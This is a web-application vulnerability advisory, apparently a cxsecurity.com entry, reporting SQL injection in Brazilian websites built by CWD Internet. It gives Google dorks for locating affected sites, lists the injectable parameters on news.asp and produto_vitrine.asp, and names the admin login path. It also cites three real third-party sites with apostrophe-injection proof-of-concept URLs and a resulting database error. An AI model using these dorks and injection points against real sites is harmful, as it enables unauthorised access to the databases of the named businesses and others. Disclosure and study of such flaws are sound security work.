Desenvolvido e Hospedado por CWD Internet Brazil SQL Injection Vulnerability

2018.06.05
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Desenvolvido e Hospedado por CWD Internet Brazil SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 05/06/2018 # Vendor Homepage : cwd.com.br # Tested On : Windows / Kali Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 ################################################################################################# # Title : Copyright © CWD Internet 2012, Todos os direitos reservados - Uma empresa do Grupo Controlp.Com.Br Web Solution Systems # Google Dork 1 : intext:''Desenvolvido e Hospedado por CWD Internet'' # Google Dork 2 : inurl:''/news.asp?tipo=T&offset='' # Exploit : /news.asp?tipo=T&offset=[SQL Injection] # Exploit : /produto_vitrine.asp?fabricante=[SQL Injection] # Exploit : /produto_vitrine.asp?categoria=[SQL Injection] # Admin Login Path => /restrito.asp ################################################################################################# # Example Site => sanseicomercial.com.br/produto_vitrine.asp?categoria=53%27 => [ Proof of Concept ] => archive.is/T1Wwq # Example Site => rotaxmotoclube.org.br/news.asp?tipo=1%27 => [ Proof of Concept ] => archive.is/ijSQJ # Example Site => 7lobos.com.br/produto_vitrine.asp?fabricante=194%27 => [ Proof of Concept ] => archive.is/Odbkf # SQL-DB Error => Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'produtos.fabricante = fornecedor.cod and produtos.categoria = categoria.cod and produtos.categoria = 53' order by fornecedor.fabricante'. /produto_vitrine.asp, line 52 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top